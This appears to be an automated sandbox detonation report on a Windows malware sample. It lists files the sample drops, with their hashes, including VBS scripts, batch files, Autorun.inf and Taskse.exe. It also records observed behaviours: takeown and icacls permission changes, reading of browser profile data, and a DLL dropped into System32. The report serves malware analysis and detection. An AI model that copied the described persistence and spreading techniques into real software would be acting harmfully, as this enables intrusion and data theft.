| SHA1 | bd3e89780f374c54c5dfbe3fab83a926ca5803de |
| SHA256 | 3c656f47268598c5bbe3ee4661b4f8c7dc09420cf393a6e417541db3c6020205 |
| SHA512 | 11e3fd1d141bd23a2b0f17665f0f57e5a606fdd82555a7bd88cd533863ce4269d8395f8963d1cdfde93efbb0817486db48c3b593f8de35e150e2395daadb762e |
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
| MD5 | b39df423c6e5978065a9a8ec4879a3b4 |
| SHA1 | 96441a7a7d8090f7a96a1160f539531f66568e88 |
| SHA256 | 12a5135510016abcfe1192aceb6fec42634346661d778d68be1debaa3d75e967 |
| SHA512 | 2d583fcae1ec73f836c5b66b8b1337bb4250a8230073de96d501a4fab5f522b75599ac2a1fcf1457a841d8c84bcccb88feade82f49357b28345c63d9526cfeb4 |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 11aa52a7eca2cf8fdcd1584b5a8b6026 |
| SHA1 | 01ae6066e6b3879cb0caf306cc91077b7c0bea1e |
| SHA256 | 8dfd0a6db2df60455840dbbbcc4f8b70d730ba1c2afbf300316898b3dd3e9b11 |
| SHA512 | 07f37c050eb59e7a1a228ca851d05ca9b62bb3de97f988fb36c374c827833c8c551e5cb51eb05130861c0b35515ca77ae667ca97ee4f08c86cdf9f6fb64533c5 |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 888e64c554686bbbc0499057cce1af36 |
| SHA1 | 5a7f51c66e3ae7dd0e0231c9817aee8c9fc54006 |
| SHA256 | 616cf19739e00c69e9606d9c94869f6fcb6a7b3860e7b8af9bc896f3081dad0d |
| SHA512 | 9882375fdd09d489258447d49b8b63d0bc8db57cdb7186500c00c79d57f30af5f37a69e8fab70683a7c9d730e3484ef537ee57bb1892a84f92e9aba639d1d227 |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | cfb046d3c9513b92c1b287da26f97c28 |
| SHA1 | ea8208c4dad826b7fdb3b5b728863a95e86d4383 |
| SHA256 | a06f170d4f92bf290e38b0ce1c05bb59c95de2797b1a5253b949ad7e1be9818b |
| SHA512 | dbeeea4d284f59e1455a5426334caa02458e88833aeece9817c51be616697ca4c399b2a9d0e8e44bf4a5ee63d0b37c0aed68c01f1748fa5a23ed6d2af62b3340 |
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
| MD5 | 95bd3350b35e064121e66185a3599c41 |
| SHA1 | 0f9f2fc3c3cf67815d78fdda3b93f91fb4b664c5 |
| SHA256 | 5adaced65862b3487049be38f0559705d90876f984c3909554c836c1eb5701da |
| SHA512 | aaadf0a39da5f59a95a57ea9a05b46a499e6ee5ff1ab29967acf0be12a0a07a261577eac7cad678e92852b55220e89d42e265a4a586fa7096d69efb2ed1e91e3 |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | 09a66de624d647dadd33c7897344dc66 |
| SHA1 | 0819f133c861cd4ca007de9abb9778a7e76cd24b |
| SHA256 | a540e358c1349df49f88e0fd99bbc844430c84dc79d2599c878743f8f4b2ddb3 |
| SHA512 | 1883d62b7fedff77e8893003719fd2e6b0a9d47963e2bfbc08e662e09145745e1f7d7a21fc47c4470e19dbef2ba274e1f87d0a6841bb804e2ed06205d5e1e779 |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | b2206e980c51067d6e9dd7575d842bdc |
| SHA1 | 5aa6f76eee9efd569089be7f363e30ebf0531a22 |
| SHA256 | add106f3d6e9cfd2fac3d14a74d6791a9caa257b9c7e105a9a5fc2a309337ecd |
| SHA512 | 89ab3ca635f8fdcb1206f0a1d585355a730506cc1d72ca666f1e9d650b24107368349b44ab0b3d3132442a2fc61c0c9404d00b717a61f305d9c93d5d638d9bec |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | d5980bf4b018e4c397df95afe8941c66 |
| SHA1 | ce53c669a898d09479831bc59bc31a5fba2a6f2b |
| SHA256 | 9afd004a8cb9b9e8b1eeab780fb0c4ffa39c3ec2ded034b1a7cd69db7f67872a |
| SHA512 | c995f9d3252b9a7af52a398562261baf3297fee64fade9de22895cce017e5aa097c7935a0519e474253a181e1e018348a1ade3d953bfaff5dc43e30e2d9fde5f |
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
| MD5 | 05a4d4594b598cfe885bf862787b8cde |
| SHA1 | dfb26e156e88af25bd00db0bc788b81c521a4db9 |
| SHA256 | fd8427db8c0c5ad2c7a8fc36c18f9400e25bdd7dfd1d267ec11a7a94bdbd1cab |
| SHA512 | ac1f87eabd69e1939f463c8710cdd1ba8a886ad6509d26d0fac4e09ab82056cf952b7a0cf2ecb55bb0549fdb0aff6457133eeb6b7b222df58f773f91df101136 |
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
| MD5 | 1bee38c8b88aedbed8df64e80c8f585c |
| SHA1 | 630d125ce7ca252feccd6e3af0d8b926ea6f6cfa |
| SHA256 | 0c0509227a0e746fed705fdb2ab39fa02c76d1684a23d3311f9cfdf5a6211d9d |
| SHA512 | aa1e8b8e6d92867c11e016d9ab32c581096985b1760432edf211ee161bf7287bfb1bcda6e3f3a041f0ef435fc22997cfaea357aa5d1e0fddf35364b1219c99f7 |
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
| MD5 | 5d33559fe6cd8ccd8884d2344f9557c8 |
| SHA1 | bc1a9ddd5fb50e28776f73323e5f4ccfe75cc882 |
| SHA256 | e0d17b0ceb42e31b5a47b7ff69ec953ca6fcf2343a5f647ebfbbab3e9da0ce3c |
| SHA512 | 7bc31a2ad1b7c345391748937b19dec273568e1305767a02ab5fe2ce5a075f8e75a95dccea6fdb0e2a4f6c31ce2764056bd40382af7914bc7959a43c70e3cefb |
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
| MD5 | 43bc6fb4ad87d3349b94ee758b39a6fe |
| SHA1 | 6fb1f6080aa5dd2f246787e41ea077962271d96e |
| SHA256 | 80e9b7c719aa2c3b4eb0fcf4e53b8e527f5c4b091de06c18eeecc32d5b9ac0f5 |
| SHA512 | 4b264610321be3534fe655d35280489624971a74a013a0b41d22049805f24be1f54fb36a051079c476b87d079122c311153839890033b4d467c37b34d78da5ae |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 6989502044e4a9fca67e9ded25de9956 |
| SHA1 | 9a8d099caad939d32599530b27f7db641cbdb8da |
| SHA256 | b370b54e95376f4b6df27592bc23343c82ebbfad3d52e71a38a2aac504bda04c |
| SHA512 | 9f0e6d59d9adc531f5c162b964205e0dd63c6a956291af48d24e6b8988a940b6f2cc7644a9163277e6383a6d9f8ddb00c9687d73426ea776c691e73f66e95a5e |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | 089381a847f01ba0962ae00f0d92d5e8 |
| SHA1 | 9f3240f89871639778a318e0cadccafcf9d7c55e |
| SHA256 | 2cda289b5067c9daf8b4dffdf323b2fe9d0a47bfdbb91b4a017029bc74729c05 |
| SHA512 | 89fbf1b423f17101970290b070d740b8d58beecc6723e64edb7ae23b9285afe3a612b8e8f5ec202d60aca3875a28dbc556a43af9fe4113ac0bdba1fa83c5213a |
C:\Users\Admin\AppData\Local\Temp\Taskse.exe
| MD5 | 6b5c03df5b27f239ee047ba2a8274e9e |
| SHA1 | 55f477bb3d17e2d762823a550b24a09d7c01ff1c |
| SHA256 | 84dec6f5ed4c4099d5b95eb9586cee3307b127b502181451c3d4c5026c64b387 |
| SHA512 | 3eefff6c34e557205ba7870db21a68805d08c76932b0c984fea8cada5e8add2ed85d470f3bea9e5780e23db60a08e0aa02330cea94e7816e9a2bcfa74843c3b9 |
C:\Users\Admin\AppData\Local\Temp\Autorun.inf
| MD5 | b20421aba6b1738af56e402aed7b5fca |
| SHA1 | 7b9e8f147c25a383e775cf4ce66fec5f050f8187 |
| SHA256 | 2b11af7c3e34fcb9851881ecb06ee601696a6e29b3d3f283f79b118bdba35ecd |
| SHA512 | 32eb6ae6c4009d43422f6abad7cd88f21b3efbd85c4a8c1fa45675f59f5c7a1d0839c6f73131522de5c0f5f1cec2dc9b4e2b00dbe68e060390cc5b6174ef9683 |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 482dcfe952218cf31ad2adddd8f6616b |
| SHA1 | 7a6bcfce28c76bc3319c871696531d21200f3bc0 |
| SHA256 | 093b0f0c3f7a9bf24406662245b57f171837a266aba49f198319045e971e77d5 |
| SHA512 | 440182ba5cd7c85abc11fe9097a41486469afde738d26f471efe4e7928106cd57240b1045bc97d60c42147ca25b032c4149487f1a1ab4581292c7eff2bc801b9 |
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | 0415beae6aaa86d022ca5bf7b2e71f0d |
| SHA1 | 59c8c6d88ce9f3129580c879e2cd83a42ce3becf |
| SHA256 | f9bdb898f561c9c281fb533bf19510edd856a4a93a5e6a73c7a4c3710fa3669b |
| SHA512 | 904bac218278001836f4c231ddf2a024db7e17a69540a5524a51c8e637b1daa78403d757de20f31dcad8eb0e3deb50605a6464d3a98cb5693c8f870059fc1038 |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 7659392a12010d8c761cb9888f6fd5ac |
| SHA1 | b8829c26628740b77ab7405c231f420e860d8c1f |
| SHA256 | 71bd0bffdeca9dce2b4e9e1d767a0732657032171f3ad33903dec353ef95a431 |
| SHA512 | 5caf94b288649b687f411cbb5519168e09e161f8d9545a6bad1b0d08876a542d153a115f8b44e3f15d973812ce8ec7471bba7d8bd0b9a22d0abf6fdf2914a2bf |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | 4732b0f9e53c40b0863e4db4e1caf930 |
| SHA1 | bf33dd224c8c457ca3bcbf21eb7e40b34e6be074 |
| SHA256 | c2f9b3d18d8c8d4803a3cc87343241ba73e143ea05d9bbbe725143b91329165a |
| SHA512 | 35e65d2f06e7bd60f58ba331e8422923fe446a713f6593124d96f76fbf86758639747c6bbc5c808c8089ddcdf24470e0b02b145763d0e091138171da1eaf40e4 |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | 57a059b0f2cda5f4a0536577dcbc64af |
| SHA1 | 4a5424719c20b318b7c76eb80566eef896553d8b |
| SHA256 | c767341b56cac24d9369f237d40d908be9bfd102dd1823327405f39424531864 |
| SHA512 | 3d890832eea007c4b20030bc93fd09cb7712901ed52f8a80ec5145321a1507f0fec890087e8c06e5a665bd0debe76aacf6e4f739a9f6e4b209df1dbffd26807a |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | a4a7caf4378513b47eb28f76f338576d |
| SHA1 | 822cc5b7b3123fb1d75202a2de8d3582945b1b4b |
| SHA256 | d97db100ee267f071e213d0005552ce69cffe560a06ddb6010b3f158580201dd |
| SHA512 | 095e1b771565fb1b68275a301a598463ce2ea1403619a5f24dd39a26eb880060b42afeb167bf1ae8f76352af5fa033cdbcab9d6ee793eed03b11eeb2fbd6a0e3 |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | ec687bebeb045b0b7b30ac9742ff70f2 |
| SHA1 | 8c48b82b81d6c1a546215caf58a9d56890872b14 |
| SHA256 | 5e2e70a75b88f3de0a6eaecfbfb6b08d162420bc7046659f8afcacefc2de5d3b |
| SHA512 | fd24d4f4e5c891c67f2ba31068f9604ffaead75744f7ccba7a2ad9c1e6c98eff90ac7743420fe5f668aba3ff6a29a9addb176fc27e54272899cb1263b587219c |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | 1de0c6642204ac19da986d10a8e31349 |
| SHA1 | 532a90a40e6d042caa81b734cf71fc2038f86478 |
| SHA256 | ea93f846550b68a1256175427c691a06c935d5d14f850009e5c8af58c89a4c2f |
| SHA512 | 9550c0e9a75f97e2ec4fec035d176da8ed479600757d14c2c1162babaf38793eb710d67714d8cb0578194dfa73fc89c82fe6d8f2eabf0aee825ddbf99a569e83 |
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | c056d53af9edf8ca2010d3db051b1cb8 |
| SHA1 | 88775cb275254fa28cefcff6c0b7c2b7c84526ef |
| SHA256 | 46334f0e79f062bc69f110cd5fbfaf575726a7ea605184d04c561ef543b827d3 |
| SHA512 | b747c96e4c4690dbae708915c3160ce3df3908ff3d2a4fb0491700f7ee29908b870ad454baccf848de54058c8f2ba98618de1912ba22b92fd43755ba98a8a377 |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | adad2cd23a8880d4b3bdb1481c5b7998 |
| SHA1 | 823fc1acc3e7a3f0cffab5cb8fa453a8c0d1872c |
| SHA256 | 838ba55eb15df2e0145178a20b4d01314d0fcde04ff871649012eaeba6bbfb69 |
| SHA512 | 8c600e32157daef85549d0a19a40f38e812e05cbf24e51453fa1ea94435e55fe4a705e77d42a4f63f3c565da98b4e69f1ed7bb6f3dbca65e80b17526954e60e4 |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | a8217e02508029f70e586635bc6db873 |
| SHA1 | ab19e9a21282b68f2c8c67953105ab95b05e6168 |
| SHA256 | 9aea836aed56a879f2b62d11ca2d35f4a56620956d6bc9fa2bbf4aee24249787 |
| SHA512 | 33074686fa13c9bf8225e5bdce20ade67a4d8170c1595fed599f6716415ffc42e6b7376eda032079c4a2048d5df78c1f2b19c5825889ce6589315e487b77880a |
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | adf50739c3bba2b5a9ab4f9a1b315ac6 |
| SHA1 | 60924f185f97db52ccca60288cf67f7b1ed7e8d7 |
| SHA256 | 24869ffa50a5d6aea3570b58c92aa811923677837d84392918989b7006fedef8 |
| SHA512 | bac35c5c2fb92809c4e5aaf436b6a536f2e2215eb53439dfd462ac5b8bb473ac4d1108ac7541084539b8ec63a85e841ca4f37aee57d6ccdfb8a219515cd5e71b |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 88a2fcd93445c8b092324fe1236d31dc |
| SHA1 | f63653fe34d54b7e42e29689a934ed097329128d |
| SHA256 | 0783070444c465de8a21f7fc41f61d2bd535e995454e4086b2e01780e96ad419 |
| SHA512 | 3e44cce194b1cc3d6946d33dee6756f0333edc886f9ebe8149887c2e9b35867575ed47f15b2c384ed37aab3b8e37dae3369e1259d132bdf9bb832c70c09e8085 |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 86d51d80346eb615bb2cbe122efdee39 |
| SHA1 | b7ffa25c9b3d68aae34fcee4e9d4ce759ee802a4 |
| SHA256 | 5d15ea660c2f819ced1adff0796db1e7bfda6609d70f0dbae5c348d81c32964b |
| SHA512 | a5d2194b6bc1d658b6a3cde2f2d51f7f7b32c736dfd52d0b7e3d9957fcb7342b0545dfe93e26bd77596edc40f27cc30cf5b1fa27c39c0e8477e453e47e9f7999 |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 2f07a0eeda90c8de4ddbc41b5720b684 |
| SHA1 | 8e0d022b1f1592512cdbd79a07262326cd087d3f |
| SHA256 | a0730b54654a17006141efa1bb1354d21ecaa56f50b119467e96f2939ac6eaad |
| SHA512 | 233361936774a28abd26f8e48de80934dbccd360c5874333006050b2f8aac5e4d94e9aae513e419b4ecf02a455e1640f306ea40dc7edd66ae8e502e96ab62d17 |
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | fd00201cd56a43bd3a10e463b3cd9af4 |
| SHA1 | 3e9b5b3be006f8cdebc64cea94b47372f528f8bb |
| SHA256 | 704afe068c35feb178bf18c69610f99eab5afb762606f19278e2e51255aeaffc |
| SHA512 | 42143e69aee9bdf71acf1e0ea1f57d32386cfb9dba4b40757c01baa91d2fd8a44537cb775e9a752719891f2530f3457ac3fcb0b955ff9efbd13d2e2895b420de |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 112c09605b53288ae37a7d6ceb8ec3c3 |
| SHA1 | 368f0b84b8f7e5835ec1ff6cfccea63b37985348 |
| SHA256 | 8b6068f92d60d8f594a3834b1fd68ccedafa8c6df2f4e0f43dcbc513561437e4 |
| SHA512 | e349a590db8474feeee721119f8ba698dabe51a16557b015cba57eff20dcb2b679bcba01fe42e75a936cbb3b5bc67af0d38176761715f2c8d83036d9f00c1430 |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 328269fd01950232034f7fc507b917ba |
| SHA1 | 44df4af7e86d3e252b6a454513a900e475d2db33 |
| SHA256 | 9327383056d89574fbeb87d98987ce8ae0cb39e8e816b12a53e9df0ec49b113d |
| SHA512 | 77acf8e91e0dc78b74548956b8e4a3b3a5cf98bacecdbed7a764ee1932f7751c7b9d49b972388eb5b762fd08ae344bcf2d5beeb698626ab15594f3209d35a13f |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 3188f652d604c7a023c7691bd2bdc67c |
| SHA1 | c5d6a84c50573b617a00a45fe24abb007de107cb |
| SHA256 | 37e07aef20c217138f7cc2aad6c747859b4a696097bab2dc7626e72be31dddeb |
| SHA512 | 9afcd2487795f18536c0fb334e8ad97f97c7168a5e6cc5e000b70840c59d24bfbd6563dedd155b0d991e50be43673933d932afbb5171fca6a288255127c841c2 |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 2349b9a6b4e3f61e53ec3a5346773122 |
| SHA1 | 8703d518627eff57174654b7b201835749c806cd |
| SHA256 | cc5a2cf7d4ea53b8c25089ed22b10dd30c8520c82e08dc5b051c1930ebcd5303 |
| SHA512 | 748e25ed43114833ee79ef7cfe35dc0486d65b1e6256e9601f528de624f08d16e2ca2bec66c471c0517d34d1c9be241e50a2d3f6893f04d37d0e2fd0cd438f65 |
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | 4ebefa3fb0a3daf47a30ef9ba799e6ef |
| SHA1 | 6b212dece7aa7c7cbcd5e6d4985bee011a73e195 |
| SHA256 | 332b6eda651a87b03c52be1216b2158c8f80e153ebc6f366d03cfefd42778a18 |
| SHA512 | a19d4148e8d6ef734543cbf5474449bf9aec2c1b4defb7a69f703e757acf25d6142f787a1681c201affa816a6caa6bd7ab84ce29cb8e6a9e81c77452491dd75a |
C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs
| MD5 | 8761f97b782a318e8fba7bc8018aa478 |
| SHA1 | 95984e4969a9aa8862139900838fdaf232c46fa4 |
| SHA256 | 47177adad71b234fdd77c0f2b5977d4766ccc59867d37e50188b02a66cadbc60 |
| SHA512 | d90862ea2d112ac605bd76823216f31daa8b60ff1d434fcbe9f04832e9d541760458e5ebbf7ce9561be42d18e0a11800b702adabfddf3bbaed08d867a5df88d6 |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 4d8b24ab53e9685096c46046ea3f20b1 |
| SHA1 | 650e5d2e2a2f263657107385b5ef87f678f36510 |
| SHA256 | 172d9d0ba529cee20b666f3b1a778801fcb24daf4c1f88e6b45312e5df16e0d6 |
| SHA512 | aa3290d3edbd16180643152d0bd6785177b372b4ba7e3ae9a1eb6fd91281ec5fec7caef839a2734430070e76629f7ce187a6f1f1921a21f01dca2583e89b535e |
C:\Windows\Debug\WIA\wiatrace.log
| MD5 | 635f90a82ff6dbb6aff1417d860ec5b3 |
| SHA1 | b633c59fbb61d20b46608be4cd8fa10458ee8936 |
| SHA256 | 3597d1266ec0e455a0cd53c57a8fd695090c0aca2611df1a179f7eb99365daed |
| SHA512 | e175266746229df627520615a3ddde80bfe5724b0d6a5fc854ab7e223d71681b241fa3bf807bf4989530a090514a62c7b9f40fa85be590a6fe9c4aa7b56e523c |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | baa511e0932e6c0781dd1488615d17a6 |
| SHA1 | e3218aefe8c272ade02eb6cc5188df6d50b04de0 |
| SHA256 | 20fa853d5be5b8f30eeb6ae3e24558a2091d80102944ab26b9861df5cea6c6fa |
| SHA512 | 24be7fabda63dd82dfb5307e2ae0dc7176bf59c0918f1316bddb7515e0695b10cd6e24420af4afcda3d5f1b01e3d540a2d75a629f40c381da05eb3c28ff4697e |
C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs
| MD5 | 81a24f8120fa35b69363a40cf5ec5a33 |
| SHA1 | c27b56e4dea4dfbb9d72dff110213897c9dfb549 |
| SHA256 | d8c095c9c445be47143b9f5cfc5b1e83b74ef6bcfa40f03c015e49ea61e57fb4 |
| SHA512 | f001bda4be38166c62166b69fa4db1d47add0890a399b57e548e459782ec763f96e7a59c2bab810eb2cd6d085124e5f375d00206cf12e2eff2adafb8746eb54e |
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
| MD5 | 9905e5a33c6edd8eb5f59780afbf74de |
| SHA1 | 64b2cd0186ff6fe05072ee88e2bb54476023772e |
| SHA256 | c134b2f85415ba5cfce3e3fe4745688335745a9bb22152ac8f5c77f190d8aee3 |
| SHA512 | e10711d0fb09db27192e9af05ae45b83cf3882d98e904a7f1f969cf24c2f9626f70f35d76f57477fe9c64a58bc74100410740e9d506d4e72d3e2900d6277816e |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | 0fdd76e3cf93e100def34ac33e62a516 |
| SHA1 | 88195f2f8182b2e70baa3909f3cdd0b8b645ff1e |
| SHA256 | 739819fe4b44a84491146a20870aa3f4605cc7e386d4274beb5615b39d95baac |
| SHA512 | 66843347dc861cc7f27b86b5fd9a11abc427b583333562393674e83df04dd03d92d25c61ba7e8f5747867d57dd749bd0ae6f1a551a35b98c4a91be2039d33992 |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | fe669e0a3a56961fba38ef9b7f7d01dd |
| SHA1 | 338b6f4a3ec71587d53aec450ca5448928f966a1 |
| SHA256 | 138b48a413afa60daa506090fa4332d913a1f9d895b6c289c36dd7db00019d64 |
| SHA512 | ff0bc50cef59421253578172602a56f9f9b3a8988a16576eaf8a004792d330c708dbed95f5f4074fb2eec36d7df7f4a0392c88420d2b0678cd907056a23cd41b |
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
| MD5 | 0eafc7e411bc95b074c8ea60b00b1f6c |
| SHA1 | 7a63173a486dd28e4159716b19b0ff838a6bfae1 |
| SHA256 | 45b48741270f8f74abbb703bf41496ae1a447ce659cee66e4583e6f96e82617a |
| SHA512 | fb71f2f1d0e05202420a1426f8e5d509f645a613c2d20d64c5d78a559f0bca7f8067e9be4665c6c2a21e7c3aa836238872430903ebd821063e1bcfbb38d404a4 |
C:\Users\Admin\AppData\Local\Temp\windowswimn32.bat
| MD5 | ea260c435f9eb83e2b5041e734ff3598 |
| SHA1 | ca70d64367cbdffbbf24e82baff4048119203a2e |
| SHA256 | 3ade659fdae17c11c3f42b712f94045691fbd0b413428b73e1de8fe699e74615 |
| SHA512 | 548624cc523aeb4136376f792d23b3f2aee4a676362f8a0dd0e8161f0df87ab926b82f67fc174eb5d9473c23f49e6ca962bc84479967f7e624250d94efa66876 |
C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd
| MD5 | 401e4eb249071b70f56d18e942ae7df2 |
| SHA1 | f3820c8c3ecf2443504736023fc0ce252d06e19c |
| SHA256 | 33413957207bff35858e95b3d8a54bf2b9e7d20882a4a62366946cfd960dbe73 |
| SHA512 | 196e7ef12447e97e3be7a7c20fd69d0d1377364def9059e8eacf05a98a003fdc0470c9e88f662d38db7c54c24135d165bbe59f32b49aaeba5e91e6941725edf6 |
C:\Users\Admin\AppData\Local\Temp\Taskdl.bat
| MD5 | a90843e895d5444355e06c5625dfb613 |
| SHA1 | 73a92d3ea21c281e5b1ab7ef031aaa9ebe625a78 |
| SHA256 | 1e9580a9b253391ef655633ca06449ec9e0751db1ae42300251d36d826f4109a |
| SHA512 | ed92df803418702ffdbc3e9c5beb7874249d418802cd1e1dd9e56d521c3fe3cb055a55fa6d2095127f4e040df95997f64abe0ec2fbbf5f5b45a0054547e2a900 |
C:\Users\Admin\AppData\Local\Temp\Informacion.vbs
| MD5 | 637146c9cb84c3e925310c222aa66e6c |
| SHA1 | cfe2e60346bfb08b9c93d3cc8511ec5a0f732846 |
| SHA256 | b266da1e37993f333dc287ceabb7bf0b61ad2750c1d0ad4e7fcb2be5597ca88c |
| SHA512 | 8e76d9cb7474912624d8d76ee6b72c33d57d776ebfba0ff27df08fe14c87322e272ea105bbcb3a3e1aef34d953ccc5b83603ec19c3d517caacc514ba78029329 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-25 17:09
Reported
2024-05-25 17:12
Platform
win7-20240508-en
Max time kernel
11s
Max time network
119s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\system32\attrib.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | C:\Windows\System32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Twain_20.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\System32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Windows\System32\Twain_20.dll | C:\Windows\system32\cmd.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
